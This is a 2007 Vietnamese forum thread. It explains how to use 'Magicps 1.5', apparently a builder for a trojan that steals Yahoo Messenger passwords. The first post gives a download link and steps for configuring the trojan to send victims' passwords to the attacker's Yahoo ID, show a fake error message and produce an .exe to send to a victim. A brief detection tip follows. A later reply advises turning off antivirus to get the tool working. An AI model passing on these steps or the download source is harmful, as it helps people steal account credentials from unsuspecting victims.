Ðiều Chỉnh
Unread 26-02-2007, 08:46 PM   #1
Default Sử dụng Magicps 1.5 & Cách Kiểm Tra

Đầu tiên bạn hãy Download tại địa chỉ:http://shacker.50webs.com/baivet/vt/trojan/mps15.zip về giải nén sẽ thấy một giao diện như sau :

Ở phần Y ! ID bạn điền vào đó nick ở yahoo mà magicps1.5 sẽ gửi pass về cho bạn , tại ô "Fake Error Message" bạn đánh dấu vào đó để tạo ra lỗi giả khi victim ấn vào file mà bạn gửi xong xuôi bạn ấn vào Create MPS , một con virut đã được tạo ra với cái tên do bạn tuỳ ý đặt nhưng mà đuôi phải là ".exe "

Nhiều bạn không biết phải phòng chống magicps 1.5 như thế nào và kiểm tra máy có magic ps 1.5 cũng quả là một điều hết sức khó khăn . Sau đây mình nói đến một cách khá đơn giản để giúp bạn có thể kiểm tra và kịp thời change pass ngay sau khi biết mình đã dính bẫy . Đầu tiên sau khi đăng nhập vào yahoo bạn hãy vào Tools => Message Archive khi đó sẽ xuất hiện một bảng điểu khiển tất cả tin nhắn bạn vừa mới gủi đi sẽ hiện lên ở đó và gửi cho ai bạn cũng có thể biết được . Khi đó kẻ cài magicps1.5 đã bị lộ mặt , vậy còn ngần ngại gì nữa mà không change pass yahoo ngay lập tức . Chúc các bạn thành công !
nguyen duc tan vẫn chưa có mặt trong diễn đàn  
Dưới đây là những người đã click Thanks nguyen duc tan về bài viết hay này:
Unread 26-02-2007, 09:14 PM   #2

bạn à!!!!!! sau khi mình giải nén minh vân không thể cài được, có phải do phần mềm chống virut không vậy!!!!!!!!!!!!!!!!!!!!!!!!!!!
chanphat01001 vẫn chưa có mặt trong diễn đàn  
Dưới đây là những người đã click Thanks chanphat01001 về bài viết hay này:
Unread 27-02-2007, 12:19 PM   #3

Magic này cũ quá rồi

mà hình như ko có tác dụng với YM hiện nay thì phải
Trường vẫn chưa có mặt trong diễn đàn  
Dưới đây là những người đã click Thanks Trường về bài viết hay này:
Unread 27-02-2007, 08:12 PM   #4

bạn à bạn hãy tắt các chương trình virut hết đi rồi hãy bắt đầu dow nó về và sủ dụng không thì dow về công toi đấy
con majic này tôi vẫn chơi YM đấy chứ
vẫn thấy có hiệu quả
các bạn cứ thử xem
chúc các bạn thành công
nguyen duc tan vẫn chưa có mặt trong diễn đàn  
Dưới đây là những người đã click Thanks nguyen duc tan về bài viết hay này:

Ðiều Chỉnh

Chuyển đến

Bây giờ là 09:13 AM. Theo múi giờ GMT +7.